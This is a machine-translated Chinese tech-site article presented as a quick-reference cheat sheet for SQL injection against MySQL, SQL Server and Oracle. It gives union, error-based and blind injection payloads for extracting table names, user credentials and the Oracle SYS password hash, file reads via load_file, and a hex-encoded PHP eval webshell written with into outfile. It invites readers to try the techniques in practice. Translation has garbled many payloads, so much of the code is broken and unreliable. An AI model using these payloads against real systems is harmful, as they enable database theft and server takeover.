Shulou(Shulou.com)05/31 Report--

The main content of this article is to explain "what is the method of SQL injection quick inspection". Interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn "what is the method of SQL injection quick check"?

0x01 Mysql

Mysql division: permission root ordinary user version mysql > 5.0mysql0# and (select count (file_priv) from mysql.user) > #

A, Load_file () this function is used to read source files, and can only read web files with absolute paths.

Note: path symbol "\" error "\" correct "/" correct, convert to hexadecimal, do not use ""

Id=1 and 1 union select 1 union select 1 var/www/index.php' 3 4 5 6 7, 8, 9, 11, 13, 14, 15, 16, loading, loading, file ('/ var/www/index.php') (physical path to hexadecimal)

Can be used to read database connection files to obtain data connection account numbers, passwords, etc.

? id=1'and 1imports 2 union select 1 www file ('D:\\ wamp\\ www\\ 111.php') 23 id=1'and 1 minutes 2 union select 1 legal loadfiles (0x443A2F77616D702F7777772F312E706870)% 23

B, into outfile function

Conditions: 1. Absolute path 2. You can use single quotation marks

? id=1 union select 1, "", 3 into outfile 'EVERVIL.php'? id=1 LIMIT 0m1WWWUniVIL.php'? id=1 LIMIT 01.WWWUniVIL.php' lines terminated by 0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27--

1.2 MySQL federated query

1.2.1 for mysql version less than 5.0

1. Determine whether it can be injected? id=1 and 1: 1, the page is normal? id=1 and 1: 2, page blank 2. Get the number of fields order by method to judge, for example: id=1 order by 4 page display normal? id=1 order by 5 page error, indicating that the number of fields is equal to 4 3. Get id=1 and bits? for example, several numbers appear on the page, which are called display bits, then these numbers are called display bits. 4. The way to guess the table name is to add the name of the Form table after the complete address of the third step, such as:? id=1 and 1 address 2 union select 1 union select 2 id=1 and 3 from users 4 this way, when the users table exists, the page will display normally, if we submit a table name that does not exist, the page will make an error. 5. The guessing field replaces the position of the display bit with: Concat (field name). ? id=1 and 1 minute 2 union select 1 union select 2 Jane 3 covert concat (username,password) from users

1.2.2 support table lookup and column lookup for Mysql version 5.0or above

1. First determine whether you can inject and+1=1, the page is normal and+1=2, page blank 2. Get the number of fields: use order by to submit:? id=1 order by 4 is correct. ? id=1 order by 5 error. So, determine that the number of fields is 4. 3. Get the display bit submission:? id=1 + and+1=2+union+select+1,2,3,4 display bit is: 2, 3, 4, 4. Get information? id=1 + and+1=2+union+select+1,2,3,version () database () user () version () database () @ @ basedir database installation path @ @ datadir database path 5. Look up the table? id=1 and 1 union select 1 from information_schema.tables where table_schema=0x74657374 (Hex of database name test) limit 0 get table: test 6. Look up the field? id=1 and 1 union select 1 union select 2 id,username,password 3 Collins name 0 meme 1 copyright-get the field: id,username,password 7. Burst field content? id=1+and+1=2+union+select+1,2,3,concat (username,password) from+test

1.3 MySQL error injection

Mysql sudden error injection method collation, through floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection and other methods.

A variety of error injection methods:

And (select 1 from (select count (*), concat (version (), floor (rand (0) * 2) x from information_schema.tables group by x) a); and (select count (*) from (select 1 union select null union select! 1) x group by concat ((select table_name from information_schema.tables limit 1), floor (rand (0) * 2) And extractvalue (1cogent concat (0x5c, (select VERSION () from information_schema.tables limit 1)) and 1 = (updatexml (1cogent concat (0x3a, (select user ()), 1)) and GeometryCollection ((select*from (select @ @ version) f) x) and polygon ((select*from (select name_const (version () 1)) x)) and linestring ((select * from (select * from (select user () a) b)) and multilinestring ((select * from (select * from (select version ()) a) b) And multipoint ((select * from (select * from (select user () a) b)); and multipolygon ((select * from (select * from (select user () a) b)); and exp (~ (select * from (select version () a)

1.4 MySQL blind injection

Based on Boolean injection

Id=1 and (select length (user () = 20 # returns the normal page length of 20-bit id=1 and ascii (substring ((SELECT username FROM users limit 0Power1), 1Jue 1)) = 97 / / intercepts the ascii value of the first data of username

Time-based injection

1 xor (if (ascii (mid (user () from (1) for (1) = 'ringing user (5), 0)) 1 xor if (ascii (substr (user (), 1)) like 1124 (1000000, md5 (' 1'),'2')

0x02 SQLServer

SA permissions: database operation, file management, command execution, registry reading, etc.

Db permissions: file management, database operation, etc.

Public permissions: database operation

2.1 SQLServer federated query

1. Determine if there is an injection? id=1 and 1 colors-return correct? id=1 and 1 words 2-return error 2. Get the number of fields? id=1 order by 2 color-return the correct page? id=1 order by 3 color-return error page field length 2 3. Check the database version? id=1 and 1 database 2 union select db_name (), null / / to get the current database 4. View the table name? id=1 and 1 union select top 1 TABLE_NAME, 2 from INFORMATION_SCHEMA.TABLES where table_name not in ('users') 5. Check the column name? id=1 and 1, 2 union select top 1 column_name, 2 from information_schema.columns where table_name = 'users' and column_name not in (' uname') 6. Get data? id=1 and 1, 2 union select top 1 uname,null from users

2.2 SQLServer error injection

1. Get the table name? id=4' and 1 > (select top 1 TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in ('admin'))-2. Get the column name? id=4' and 1 > (select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='admin' and column_name not in ('id'))-- 3. Get data? id=4' and 1 = (select top 1 pwd from admin)-- 4. Get database information? id=1' and 1 = (select @ @ version)-/ / SQL Server 2000? id=1' and 1 = (select db_name ()) / / currently used database

2.3 SQLServer blind injection

1. Guess the table name? id=1 and (select count (*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and len (name) = 7) = 1-/ / get the length of the first table 7? id=1 and (select count (*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii (substring (name) Id=1 and (select count (*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name not in ('users')) and ascii (substring (name,1,1)) > 115) = 1-/ guess the first ASCII value of the second table to get the table name Further guess field 2. Guess field id=1 and (select count (*) from syscolumns where name in (select top 1 name from syscolumns where id= (select id from sysobjects where name='users')) and ascii (substring (name,1,1)) = 1 / / get the ASCII value of the first field of the users table id=1 and (select count (*) from syscolumns where name in (select top 1 name from syscolumns where id= (select id from sysobjects where name='users')) and name not in ('upass') and ascii (substring (name)) 1 select top 1) > 90) = 1-/ / get the first ASCII value of the second field of the user table 3, guess the data id=1 and (substring (select top 1 uname from users), 1Pol 1)) = 33-/ / get the first ASCII value of the uname field in the users table

0x03 Oracle

3.1 Joint query

Union select null,null,null starts with the first null and adds' null', to get the display bit Union select null,null,null from dual returns correctly. There is a dual table Union Select tablespace_name from user_tablespaces / / look up the library Union Select table_name from user_tables where rownum=1 and table_name'news' / / look up the table Union Select column_name from user_tab_columns where table_name='users' / / look up the column? id=1 order by 1 obtain the number of fields and+1=1+union+all+select+ (SELECT banner FROM v$version where rownum=1) + from+dual--// get the database version and+1=1+union+all+select+ (select user from dual where rownum=1) + from+dual--// get Take the user name union+all+select+ (select password from sys.user$ where rownum=1 and name='SYS') + from+dual---/ get the user SYS ciphertext password union+all+select+ (SELECT name FROM v$database) + from+dual--// get the library name and+1=1+union+all+select+ (select table_name from user_tables where rownum=1) + from+dual--//  to get the first table name

3.2 Manual error injection

The biggest difference is the function utl_inaddr.get_host_address, which can be called by 10g. 11g requires dba high privilege / / to determine whether it is oracle? id=1 and exists (select * from dual)-/ / get the library name? id=1 and 1=utl_inaddr.get_host_address ((SELECT name FROM v$database))-/ / get the ip where the database server is located? id=1 and 1=ctxsys.drithsx.sn (1, (select UTL_INADDR.get_host_address from dual where rownum=1))--? id=1 and 1 = CTXSYS.CTX_QUERY.CHK_XPATH ((select banner from v$version where rownum=1),'a' 'b')--? id=1 or 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH ((select banner from v$version where rownum=1),' axiomanageme')--? id=1 and (select dbms_xdb_version.uncheckout ((select user from dual)) from dual) is not null--? id=1 and 1=ctxsys.drithsx.sn (1, (select user from dual))--

3.3 Blind injection

Blind notes based on Boolean types:

? id=7782' and length ((SELECT name FROM v$database)) = 4murl-get database name length? id=7782' and ascii (substr ((SELECT name FROM v$database), 1meme1)) = 79Murray-get database name the first bit is O

Blind bets based on time delay:

? id=7782' and 1 = (CASE WHEN (ascii (substr ((SELECT name FROM v$database) = 79) THEN 1 ELSE 2 END)--? id=7782' AND 1 = (CASE WHEN (ascii (substr ((SELECT name FROM v$database) = 79) THEN DBMS_PIPE.RECEIVE_MESSAGE (CHR | | CHR (102), 5) ELSE 1 END)-- so far, I believe you have a better understanding of "what is the method of SQL injection quick inspection" You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.